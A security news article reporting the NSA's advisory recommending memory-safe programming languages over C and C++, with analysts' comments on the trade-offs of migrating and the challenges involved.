The default setting for cloud-based password managers is to log in with 2FA. If you use a password manager on your phone, it usually has biometrics – fingerprint or facial recognition. This adds another layer of security to password access.

**Ustwo-factor authentication**

We regularly cover two-factor authentication (2FA) in our magazine, so the term is certainly not new to you. Simply put, 2FA adds an extra layer of protection to your login, so a simple password is no longer enough. To log in, you will still need to enter a one-time password (OTP), which is generated separately on the device you have. This is usually an app on your smartphone that shows you an OTP password for each “paired” service, which is valid for a very short period.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Study shows that 42% of people use their names in passwords

Languages such as C and C++ rely too heavily on the programmer not making simple memory-related security errors.

Security analysts welcomed a recommendation from the US National Security Agency (NSA) last week for software developers to consider adopting languages, such as C#, Go, Java, Ruby, Rust, and Swift, that reduce memory-related vulnerabilities in code.

The NSA described these as "memory-safe" languages that manage memory automatically as part of the computer language. They do not rely on the programmer to implement memory security and instead use a combination of compile time and runtime checks to protect against memory errors, the NSA said.

**The Case for Memory-Safe Languages**

The NSA's somewhat unusual advisory on Nov. 10 pointed to widely used languages such as C and C++ as relying too heavily on programmers not to make memory-related mistakes, which it noted continues to be the top cause for security vulnerabilities in software. Previous studies — one by Microsoft in 2019 and another from Google in 2020 related to its Chrome browser, for instance — found 70% of vulnerabilities were memory-safety issues, the NSA said.

"Commonly used languages, such as C and C++, provide a lot of freedom and flexibility in memory management while relying heavily on the programmer to perform the needed checks on memory references," the NSA said. This often results in exploitable vulnerabilities tied to simple mistakes such as buffer overflow errors, memory allocation issues, and race conditions.

C#, Go, Java, Ruby, Rust, Swift, and other memory-safe languages do not completely eliminate the risk of these issues, the NSA said in its advisory. Most of them, for instance, include at least a few classes or functions that aren't memory-safe and allow the programmer to perform a potentially unsafe memory management function. Memory-safe languages can sometimes also include libraries written in languages that contain potentially unsafe memory functions.

But even with these caveats, memory-safe languages can help reduce vulnerabilities in software resulting from poor and careless memory management, the NSA said.

Tim Mackey, principal security strategist at Synopsys Cybersecurity Research Center, welcomes the NSA's recommendation. The use of memory-safe languages should, in fact, be the default for most applications, he says.

"For practical purposes, relying on developers to focus on memory management issues instead of programming cool, new features represents a tax on innovation," he says.

With memory-safe programming languages and associated frameworks, it is the authors of the language that ensure proper memory management and not the application developers, Mackey says.

**Shift Can Be Challenging**

Shifting a mature software development environment from one language to another can be hard, the NSA acknowledged. Programmers will need to learn the new language, and there are likely going to be newbie mistakes and efficiency hits during the process. The extent of memory security that is available can also vary significantly by language. Some might offer only minimal memory security, while others offer considerable protections around memory access, allocation, and management.

In addition, organizations will need to consider how much of a tradeoff they are willing to make between security and performance. "Memory safety can be costly in performance and flexibility," the NSA warned. "For languages with an extreme level of inherent protection, considerable work may be needed to simply get the program to compile due to the checks and protections."

Myriad variables are in play when trying to port an application from one language to another, says Mike Parkin, senior technical engineer at Vulcan Cyber.

"In a best-case scenario, the shift is simple and an organization can accomplish it relatively painlessly," Parkin says. "In others, the application relies on features that are trivial in the original language but require extensive and expensive development to re-create in the new one."

The use of memory-safe languages also doesn't replace the need for proper software testing, Mackey cautions. Just because a programming language is memory-safe doesn't mean the language or applications developed on it are free from bugs.

Moving from one programming language to another is a risky proposition unless you have staff that already understands both the old language and the new one, Mackey says.

"Such a migration is best done when the application is going through a major version update," he notes. "Otherwise there is the potential that inadvertent bugs are introduced as part of the migration effort."

Mackey suggests that organizations consider using microservices when it comes to shifting languages.

"With a microservices architecture, the application is decomposed into a set of services that are containerized," Mackey says. "From the perspective of a programming language, there is nothing that inherently requires that each microservice be programmed in the same programming language as other services within the same application."

**Making the Move**

Recent data from Statista shows that many developers are already using languages that are considered memory-safe. For instance, nearly two-thirds (65.6%) use JavaScript, nearly half (48.06%) use Python, one-third use Java, and nearly 28% use C#. At the same time, a substantial proportion are still using unsafe languages, such as C++ (22.5%) and C (19.25%).

"I think many organizations have already been switching away from C/C++ not only for the memory-safety issue, but also for the overall ease of development and maintenance," says Johannes Ullrich, dean of research at the SANS Technology Institute. "But there will still be legacy code bases that will have to be maintained for many years to come."

NSA's advisory offered little insight into what might have prompted its recommendation at this juncture. But John Bambenek, principal threat hunter at Netenrich, advises organizations not to ignore it.

"Memory vulnerabilities and attacks have been pervasive since the 1990s, so in general, this is good advice," he says. "With that being said, as this is coming from the NSA, I believe this advice should take added urgency and is being driven by knowledge they have and we don't."

Tag

#chrome